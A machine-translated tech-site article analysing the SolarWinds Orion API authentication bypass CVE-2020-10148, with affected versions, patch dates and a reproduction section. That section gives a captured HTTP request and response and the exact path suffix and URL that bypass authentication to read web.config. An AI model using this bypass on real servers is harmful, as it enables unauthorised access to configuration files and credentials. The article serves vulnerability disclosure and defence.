Shulou(Shulou.com)05/31 Report--

This article introduces what the analysis of SolarWinds Orion API remote code execution vulnerability CVE-2020-10148 is like, the content is very detailed, interested friends can refer to, hope to be helpful to you.

SolarWinds Orion API remote code execution vulnerability

(CVE-2020-10148)

I. Overview of loopholes

SolarWinds Orion API is embedded in Orion Core and is used to interface with all SolarWinds Orion Platform products. API authentication can be bypassed by including specific parameters in the Request.PathInfo portion of the URI request, which may allow an attacker to execute unauthenticated API commands. If an attacker appends the PathInfo parameter of WebResource.adx,scriptResource.adx,i18n.ashx or Skipi18n to a request to the SolarWinds Orion server, SolarWinds may set the SkipAuthorization flag, which may allow processing of API requests without authentication.

An attacker can use this vulnerability to remotely execute arbitrary code, which is exploited by professional hacker organizations to deliver malicious programs codenamed 'SUPERNOVA'.

Second, the scope of impact of vulnerabilities

Affect the version:

SolarWinds Orion 2020.2.1 HF 2 and prior to 2019.4 HF 6

Secure version:

SolarWinds Orion 2019.4 HF 6 (released on December 14, 2020)

SolarWinds Orion 2020.2.1 HF 2 (released on December 15, 2020)

SolarWinds Orion 2019.2 SUPERNOVA Patch (released on December 23rd, 2020)

SolarWinds Orion 2018.4 SUPERNOVA Patch (released on December 23rd, 2020)

SolarWinds Orion 2018.2 SUPERNOVA Patch (released on December 23rd, 2020)

III. Recurrence of loopholes

Access / Orion/invalid.aspx.js path to obtain data from Location in the intercept request header

Location:/Orion/invalid.aspx.js.i18n.ashx?l=en-us&v=43005.14.L

GET/Orion/invalid.aspx.jsHTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0Accept: text/css,*/*;q=0.1Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en Q=0.2Accept-Encoding: gzip, deflateConnection: closeReferer: http://127.0.0.1/Orion/Login.aspx?ReturnUrl=%2fCookie: ASP.NET_SessionId=p5yxzzumyllsfprttbkexo4u; TestCookieSupport=Supported; Orion_IsSessionExp=TRUE

Response

HTTP/1.1404Not FoundCache-Control: no-cachePragma: no-cacheExpires:-1Location: / Orion/invalid.aspx.js.i18n.ashx?l=en-us&v=43005.14.LServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Same-Domain: 1X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockDate: Wed, 30 Dec 2020 01:55:43 GMTConnection: closeContent-Length: 0

Bypass authentication by carrying .i18n.ashx? l=en-US&v=43005.14.L to the next access path. The web.config file is accessed here.

Direct access is also possible:

Http://127.0.0.1/web.config.i18n.ashx?l=en-us&v=43005.14.L

On the SolarWinds Orion API remote code execution vulnerability CVE-2020-10148 analysis is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.